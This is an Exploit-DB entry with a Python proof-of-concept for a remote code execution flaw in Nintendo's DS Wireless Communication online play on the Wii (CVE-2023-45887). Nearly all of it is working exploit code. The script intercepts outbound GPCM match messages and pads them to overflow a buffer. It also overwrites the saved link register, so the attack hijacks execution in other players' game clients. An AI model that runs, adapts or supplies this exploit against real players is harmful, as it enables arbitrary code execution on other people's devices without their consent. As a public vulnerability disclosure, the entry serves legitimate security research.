DS Wireless Communication - Remote Code Execution

EDB-ID:

51798

CVE:

N/A




Platform:

Hardware

Date:

2024-02-15


# Exploit Title: DS Wireless Communication Remote Code Execution
# Date: 11 Oct 2023
# Exploit Author: MikeIsAStar
# Vendor Homepage: https://www.nintendo.com
# Version: Unknown
# Tested on: Wii
# CVE: CVE-2023-45887

"""This code will inject arbitrary code into a client's game.

You are fully responsible for all activity that occurs while using this code.
The author of this code can not be held liable to you or to anyone else as a
result of damages caused by the usage of this code.
"""

import re
import sys

try:
    import pydivert
except ModuleNotFoundError:
    sys.exit("The 'pydivert' module is not installed !")


# Variables
LR_SAVE = b'\x41\x41\x41\x41'
assert len(LR_SAVE) == 0x04
PADDING = b'MikeStar'
assert len(PADDING) > 0x00

# Constants
DWC_MATCH_COMMAND_INVALID = b'\xFE'
PADDING_LENGTH = 0x23C
FINAL_KEY = b'\\final\\'
WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'


def try_modify_payload(payload):
    message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT'
    message = re.search(message_pattern, payload)
    if not message:
        return None

    payload = payload[:message.end()]
    payload += DWC_MATCH_COMMAND_INVALID
    payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH]
    payload += LR_SAVE
    payload += FINAL_KEY
    return payload


def main():
    try:
        with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:
            for packet in packet_buffer:
                payload = try_modify_payload(packet.payload)
                if payload is not None:
                    print('Modified a GPCM message !')
                    packet.payload = payload
                packet_buffer.send(packet)
    except KeyboardInterrupt:
        pass
    except PermissionError:
        sys.exit('This program must be run with administrator privileges !')


if __name__ == '__main__':
    main()